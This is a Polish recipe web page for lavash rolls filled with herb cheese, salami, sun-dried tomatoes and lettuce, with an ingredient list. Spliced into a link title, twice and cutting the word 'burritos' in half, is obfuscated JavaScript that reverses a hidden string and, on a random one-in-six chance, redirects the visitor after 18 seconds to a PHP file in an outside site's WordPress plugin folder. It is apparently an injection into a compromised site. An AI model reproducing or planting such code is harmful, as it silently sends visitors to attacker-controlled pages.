parallax background

Roladki z lawasza

Meksykańskie burit$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos z lawasza
23 września 2019
Lawasz z tuńczykiem
23 września 2019
 

R oladki z lawasza to szybka w wykonaniu przekąska, którą można wypełnić ulubionymi dodatkami. Moja propozycja to składniki we włoskim stylu, czyli połączenie salami i suszonych pomidorów z dodatkiem ziołowego serka i chrupiącej sałaty. Tak przygotowane roladki świetnie sprawdzą się podczas spotkania ze znajomymi, a także jako lekka kolacja. Lawasz posmarować serkiem, ułożyć pokrojone suszone pomidory, plasterki salami oraz sałatę. Zwinąć lawasz w roladki i przebić je kilkoma wykałaczkami, w odstępach ok. 4 cm. Pokroić roladki tak aby na środku każdego kawałka znajdowała się wykałaczka.

 

Składniki:

  • Lawasz - 2 placki
  • Śmietankowy serek ziołowy (do smarowania) - 80 g
  • Sałata lodowa - 6 liści
  • Salami - 10 plastrów
  • Suszone pomidory z zalewy - 6 sztuk
 
parallax background

Liczba porcji - 3/4 | Czas gotowania - 15 min

Komentarze są wyłączone.